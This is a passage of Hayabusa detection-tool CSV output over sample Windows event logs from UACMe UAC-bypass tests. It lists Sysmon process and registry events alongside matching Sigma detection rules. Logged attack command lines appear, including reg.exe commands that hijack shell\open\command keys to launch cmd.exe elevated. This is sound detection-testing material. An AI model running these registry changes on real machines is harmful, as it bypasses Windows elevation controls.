eventvwr.msc | Process: C:\Windows\System32\mmc.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: UACME.exe 39 | LID: 0x18d3b3 | PID: 4056 | PGUID: 747F3D96-A356-5D45-0000-001014F99901",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_39.evtx +2019-08-03 15:08:07.508 +00:00,MSEDGEWIN10,7,low,,Image Loaded_Sysmon Alert,"Execution - Image Loaded from suspicious path | Image: C:\Users\IEUser\AppData\Local\Temp\pe386.dll | Process: C:\Windows\System32\mmc.exe | Company: Hazardous Environments | Signed: false | Signature: Unavailable | PID: 4056 | PGUID: 747F3D96-A356-5D45-0000-001014F99901 | Hash: SHA1=60BFDEAE730B165AF65A82817CED76F7400C9CF0,MD5=CC591D9CA772C818093FED853BF64848,SHA256=EC793B0A45BDB2F15D210E545A893AA096D68FF537DD022C4B443BDE2A448491,IMPHASH=069E5461D2FBAD8D4C3909C4E0340847",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_39.evtx +2019-08-03 15:08:07.558 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\mmc.exe"" eventvwr.msc | LID: 0x18d3b3 | PID: 5396 | PGUID: 747F3D96-A357-5D45-0000-0010BD149A01",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_39.evtx +2019-08-03 15:08:07.558 +00:00,MSEDGEWIN10,1,high,LatMov,MMC Spawning Windows Shell,,rules/sigma/process_creation_sysmon/proc_creation_win_mmc_spawn_shell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_39.evtx +2019-08-03 15:16:30.389 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: UACME.exe 41 | Process: C:\Users\IEUser\Desktop\UACME.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x18d3fb | PID: 8100 | PGUID: 747F3D96-A54E-5D45-0000-001080F2A001",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_41.evtx +2019-08-03 15:16:30.389 +00:00,MSEDGEWIN10,1,high,Evas | PrivEsc,UAC Bypass Tool UACMe,,rules/sigma/process_creation_sysmon/proc_creation_win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_41.evtx +2019-08-03 15:16:30.389 +00:00,MSEDGEWIN10,1,low,Exec,Process Start From Suspicious Folder,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_41.evtx +2019-08-03 15:16:31.012 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 896 342 00000280644BB040 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 1080 | PGUID: 747F3D96-A54E-5D45-0000-0010D507A101,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_41.evtx +2019-08-03 15:16:31.779 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\system32\DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7} | LID: 0x18d3b3 | PID: 1716 | PGUID: 747F3D96-A54F-5D45-0000-0010D83FA101",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_41.evtx +2019-08-03 15:16:31.779 +00:00,MSEDGEWIN10,1,high,Exec | Evas | PrivEsc,CMSTP UAC Bypass via COM Object Access,,rules/sigma/process_creation_sysmon/proc_creation_win_cmstp_com_object_access.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_41.evtx +2019-08-03 15:16:31.875 +00:00,MSEDGEWIN10,5,info,,Process Terminated,Process: C:\Users\IEUser\Desktop\UACME.exe | PID: 8100 | PGUID: 747F3D96-A54E-5D45-0000-001080F2A001,rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_41.evtx +2019-08-04 07:26:33.984 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: UACME.exe 43 | Process: C:\Users\IEUser\Desktop\UACME.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x18d3fb | PID: 7436 | PGUID: 747F3D96-88A9-5D46-0000-0010EC927D03",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_43.evtx +2019-08-04 07:26:33.984 +00:00,MSEDGEWIN10,1,high,Evas | PrivEsc,UAC Bypass Tool UACMe,,rules/sigma/process_creation_sysmon/proc_creation_win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_43.evtx +2019-08-04 07:26:33.984 +00:00,MSEDGEWIN10,1,low,Exec,Process Start From Suspicious Folder,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_43.evtx +2019-08-04 07:26:34.302 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 896 342 0000028064468040 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 1412 | PGUID: 747F3D96-88AA-5D46-0000-00101C9F7D03,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_43.evtx +2019-08-04 07:26:34.689 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 896 330 000002806444C490 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 6488 | PGUID: 747F3D96-88AA-5D46-0000-001059C57D03,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_43.evtx +2019-08-04 07:26:35.182 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\system32\DllHost.exe /Processid:{D2E7041B-2927-42FB-8E9F-7CE93B6DC937} | LID: 0x18d3b3 | PID: 4300 | PGUID: 747F3D96-88AB-5D46-0000-001081ED7D03",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_43.evtx +2019-08-04 07:26:35.182 +00:00,MSEDGEWIN10,1,high,Exec | Evas | PrivEsc,CMSTP UAC Bypass via COM Object Access,,rules/sigma/process_creation_sysmon/proc_creation_win_cmstp_com_object_access.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_43.evtx +2019-08-04 07:26:36.239 +00:00,MSEDGEWIN10,5,info,,Process Terminated,Process: C:\Users\IEUser\Desktop\UACME.exe | PID: 7436 | PGUID: 747F3D96-88A9-5D46-0000-0010EC927D03,rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_43.evtx +2019-08-04 08:56:16.228 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: UACME.exe 45 c:\Windows\SysWOW64\notepad.exe | Process: C:\Users\IEUser\Desktop\UACME.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x18d3fb | PID: 3580 | PGUID: 747F3D96-9DB0-5D46-0000-00108243AF03",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_45.evtx +2019-08-04 08:56:16.228 +00:00,MSEDGEWIN10,1,high,Evas | PrivEsc,UAC Bypass Tool UACMe,,rules/sigma/process_creation_sysmon/proc_creation_win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_45.evtx +2019-08-04 08:56:16.228 +00:00,MSEDGEWIN10,1,low,Exec,Process Start From Suspicious Folder,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_45.evtx +2019-08-04 08:56:16.650 +00:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,PrivEsc - UAC bypass UACME-45 | SetValue: HKU\S-1-5-21-3461203602-4096304019-2269080069-1000_Classes\exefile\shell\open\command\(Default): c:\Windows\SysWOW64\notepad.exe | Process: C:\Windows\explorer.exe | PID: 3580 | PGUID: 747F3D96-9DB0-5D46-0000-00108243AF03,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_45.evtx +2019-08-04 08:56:16.650 +00:00,MSEDGEWIN10,13,high,Evas | PrivEsc,Shell Open Registry Keys Manipulation,,rules/sigma/registry_sysmon/registry_event/registry_event_shell_open_keys_manipulation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_45.evtx +2019-08-04 08:56:16.967 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 896 294 0000028064421EA0 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 5980 | PGUID: 747F3D96-9DB0-5D46-0000-0010AE65AF03,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_45.evtx +2019-08-04 08:56:18.321 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\ChangePk.exe"" | Process: C:\Windows\System32\changepk.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\slui.exe"" 0x03 | LID: 0x18d3b3 | PID: 2364 | PGUID: 747F3D96-9DB2-5D46-0000-00106DBDAF03",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_45.evtx +2019-08-04 08:56:18.321 +00:00,MSEDGEWIN10,1,high,Evas | PrivEsc,UAC Bypass Using ChangePK and SLUI,,rules/sigma/process_creation_sysmon/proc_creation_win_uac_bypass_changepk_slui.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_45.evtx +2019-08-04 08:56:20.446 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 896 444 00000280644250C0 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 5208 | PGUID: 747F3D96-9DB4-5D46-0000-0010F825B003,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_45.evtx +2019-08-04 08:56:20.937 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\SystemSettingsAdminFlows.exe"" EnterProductKey | Process: C:\Windows\System32\SystemSettingsAdminFlows.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\ImmersiveControlPanel\SystemSettings.exe"" -ServerName:microsoft.windows.immersivecontrolpanel | LID: 0x18d3b3 | PID: 7880 | PGUID: 747F3D96-9DB4-5D46-0000-00105E3CB003",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_45.evtx +2019-08-04 08:56:22.193 +00:00,MSEDGEWIN10,12,medium,Evas,Removal of Potential COM Hijacking Registry Keys,,rules/sigma/registry_sysmon/registry_delete/registry_delete_removal_com_hijacking_registry_key.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_45.evtx +2019-08-04 08:56:22.267 +00:00,MSEDGEWIN10,5,info,,Process Terminated,Process: C:\Users\IEUser\Desktop\UACME.exe | PID: 3580 | PGUID: 747F3D96-9DB0-5D46-0000-00108243AF03,rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_45.evtx +2019-08-04 09:10:28.612 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: UACME.exe 53 | Process: C:\Users\IEUser\Desktop\UACME.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x18d3fb | PID: 7616 | PGUID: 747F3D96-A104-5D46-0000-00102B92BC03",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_53.evtx +2019-08-04 09:10:28.612 +00:00,MSEDGEWIN10,1,high,Evas | PrivEsc,UAC Bypass Tool UACMe,,rules/sigma/process_creation_sysmon/proc_creation_win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_53.evtx +2019-08-04 09:10:28.612 +00:00,MSEDGEWIN10,1,low,Exec,Process Start From Suspicious Folder,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_53.evtx +2019-08-04 09:10:28.807 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: C:\Windows\system32\reg.exe add HKEY_CURRENT_USER\Software\Classes\Folder\shell\open\command /v ""DelegateExecute"" /t REG_SZ /d """" /f | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: sihost.exe | LID: 0x18d3fb | PID: 7312 | PGUID: 747F3D96-A104-5D46-0000-0010C79CBC03",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_53.evtx +2019-08-04 09:10:28.893 +00:00,MSEDGEWIN10,13,high,PrivEsc | Evas,Bypass UAC Using DelegateExecute,,rules/sigma/registry_sysmon/registry_set/registry_set_bypass_uac_using_delegateexecute.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_53.evtx +2019-08-04 09:10:28.925 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: C:\Windows\system32\reg.exe add HKEY_CURRENT_USER\Software\Classes\Folder\shell\open\command /v """" /t REG_SZ /d ""C:\Windows\system32\cmd.exe"" /f | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: sihost.exe | LID: 0x18d3fb | PID: 2576 | PGUID: 747F3D96-A104-5D46-0000-001092A6BC03",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_53.evtx +2019-08-04 09:10:29.060 +00:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,PrivEsc - UAC bypass UACME-53 | SetValue: HKU\S-1-5-21-3461203602-4096304019-2269080069-1000_Classes\Folder\shell\open\command\(Default): C:\Windows\system32\cmd.exe | Process: C:\Windows\system32\reg.exe | PID: 2576 | PGUID: 747F3D96-A104-5D46-0000-001092A6BC03,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_53.evtx +2019-08-04 09:10:29.409 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\sdclt.exe"" | Process: C:\Windows\System32\sdclt.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: UACME.exe 53 | LID: 0x18d3fb | PID: 4512 | PGUID: 747F3D96-A105-5D46-0000-001071B8BC03",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_53.evtx +2019-08-04 09:10:29.431 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 896 300 000002806445E5C0 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 7604 | PGUID: 747F3D96-A105-5D46-0000-001020C0BC03,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_53.evtx +2019-08-04 09:10:30.395 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\sdclt.exe"" | Process: C:\Windows\System32\sdclt.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: UACME.exe 53 | LID: 0x18d3b3 | PID: 4532 | PGUID: 747F3D96-A105-5D46-0000-00103BEBBC03",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_53.evtx +2019-08-04 09:10:30.395 +00:00,MSEDGEWIN10,1,medium,PrivEsc | Evas,High Integrity Sdclt Process,,rules/sigma/process_creation_sysmon/proc_creation_win_high_integrity_sdclt.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_53.evtx +2019-08-04 09:10:30.752 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\System32\control.exe"" /name Microsoft.BackupAndRestoreCenter | Process: C:\Windows\System32\control.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\sdclt.exe"" | LID: 0x18d3b3 | PID: 1380 | PGUID: 747F3D96-A106-5D46-0000-00107201BD03",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_53.evtx +2019-08-04 09:10:30.752 +00:00,MSEDGEWIN10,1,medium,PrivEsc,Sdclt Child Processes,,rules/sigma/process_creation_sysmon/proc_creation_win_sdclt_child_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_53.evtx +2019-08-04 09:10:30.972 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\control.exe"" /name Microsoft.BackupAndRestoreCenter | LID: 0x18d3b3 | PID: 6604 | PGUID: 747F3D96-A106-5D46-0000-00102425BD03",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_53.evtx +2019-08-04 09:10:35.402 +00:00,MSEDGEWIN10,12,medium,Evas,Removal of Potential COM Hijacking Registry Keys,,rules/sigma/registry_sysmon/registry_delete/registry_delete_removal_com_hijacking_registry_key.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_53.evtx +2019-08-04 09:10:35.454 +00:00,MSEDGEWIN10,5,info,,Process Terminated,Process: C:\Users\IEUser\Desktop\UACME.exe | PID: 7616 | PGUID: 747F3D96-A104-5D46-0000-00102B92BC03,rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_53.evtx +2019-08-04 09:33:57.582 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: UACME.exe 55 c:\Windows\SysWOW64\notepad.exe | Process: C:\Users\IEUser\Desktop\UACME.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x18d3fb | PID: 3916 | PGUID: 747F3D96-A685-5D46-0000-00109B2AD703",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_54.evtx +2019-08-04 09:33:57.582 +00:00,MSEDGEWIN10,1,high,Evas | PrivEsc,UAC Bypass Tool UACMe,,rules/sigma/process_creation_sysmon/proc_creation_win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_54.evtx +2019-08-04 09:33:57.582 +00:00,MSEDGEWIN10,1,low,Exec,Process Start From Suspicious Folder,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_54.evtx +2019-08-04 09:33:57.800 +00:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\IEUser\AppData\Local\Temp\Fubuki.exe | Process: C:\Windows\explorer.exe | PID: 3916 | PGUID: 747F3D96-A685-5D46-0000-00109B2AD703,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_54.evtx +2019-08-04 09:33:57.800 +00:00,MSEDGEWIN10,11,low,ResDev,Creation of an Executable by an Executable,,rules/sigma/file_event/file_event_win_susp_dropper.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_54.evtx +2019-08-04 09:33:58.087 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: C:\windows\system32\cmd.exe ""C:\Windows\system32\osk.exe"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: UACME.exe 55 c:\Windows\SysWOW64\notepad.exe | LID: 0x18d3fb | PID: 3296 | PGUID: 747F3D96-A685-5D46-0000-00100D41D703",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_54.evtx +2019-08-04 09:33:58.127 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: c:\Windows\SysWOW64\notepad.exe | Process: C:\Users\IEUser\AppData\Local\Temp\Fubuki.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: UACME.exe 55 c:\Windows\SysWOW64\notepad.exe | LID: 0x18d3fb | PID: 5860 | PGUID: 747F3D96-A685-5D46-0000-00106442D703,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_54.evtx +2019-08-04 09:33:58.127 +00:00,MSEDGEWIN10,1,high,Evas | PrivEsc,UAC Bypass Tool UACMe,,rules/sigma/process_creation_sysmon/proc_creation_win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_54.evtx +2019-08-04 09:33:58.127 +00:00,MSEDGEWIN10,1,low,Exec,Process Start From Suspicious Folder,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_54.evtx +2019-08-04 09:33:58.713 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\msconfig.exe"" -5 | Process: C:\Windows\System32\msconfig.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: c:\Windows\SysWOW64\notepad.exe | LID: 0x18d3fb | PID: 3020 | PGUID: 747F3D96-A686-5D46-0000-00108F56D703",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_54.evtx +2019-08-04 09:33:58.714 +00:00,MSEDGEWIN10,10,low,,Process Access,Src Process: C:\Users\IEUser\AppData\Local\Temp\Fubuki.exe | Tgt Process: C:\Windows\system32\msconfig.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 5860 | Src PGUID: 747F3D96-A685-5D46-0000-00106442D703 | Tgt PID: 3020 | Tgt PGUID: 747F3D96-A686-5D46-0000-00108F56D703,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_54.evtx +2019-08-04 09:33:58.774 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: consent.exe 896 322 000002806447A490 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo | LID: 0x3e7 | PID: 4660 | PGUID: 747F3D96-A686-5D46-0000-00100958D703,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_54.evtx +2019-08-04 09:33:59.225 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\msconfig.exe"" -5 | Process: C:\Windows\System32\msconfig.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: c:\Windows\SysWOW64\notepad.exe | LID: 0x18d3b3 | PID: 4544 | PGUID: 747F3D96-A686-5D46-0000-0010EA77D703",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_54.evtx +2019-08-04 09:34:00.871 +00:00,MSEDGEWIN10,5,info,,Process Terminated,Process: C:\Users\IEUser\AppData\Local\Temp\Fubuki.exe | PID: 5860 | PGUID: 747F3D96-A685-5D46-0000-00106442D703,rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_54.evtx +2019-08-04 09:34:01.014 +00:00,MSEDGEWIN10,5,info,,Process Terminated,Process: C:\Users\IEUser\Desktop\UACME.exe | PID: 3916 | PGUID: 747F3D96-A685-5D46-0000-00109B2AD703,rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_54.evtx +2019-08-04 10:16:29.676 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: UACME.exe 56 | Process: C:\Users\IEUser\Desktop\UACME.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x18d3fb | PID: 7588 | PGUID: 747F3D96-B07D-5D46-0000-00103C8C0F04",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx +2019-08-04 10:16:29.676 +00:00,MSEDGEWIN10,1,high,Evas | PrivEsc,UAC Bypass Tool UACMe,,rules/sigma/process_creation_sysmon/proc_creation_win_hktl_uacme_uac_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx +2019-08-04 10:16:29.676 +00:00,MSEDGEWIN10,1,low,Exec,Process Start From Suspicious Folder,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_56.evtx +2019-08-04 10:16:31.175 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: C:\Windows\system32\reg.exe add HKEY_CURRENT_USER\Software\Classes\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\shell\open\command /v ""DelegateExecute"" /t REG_SZ /d """" /f | Process: C:\Windows\System32\reg.exe | User: MSEDGEWIN10\IEUser | 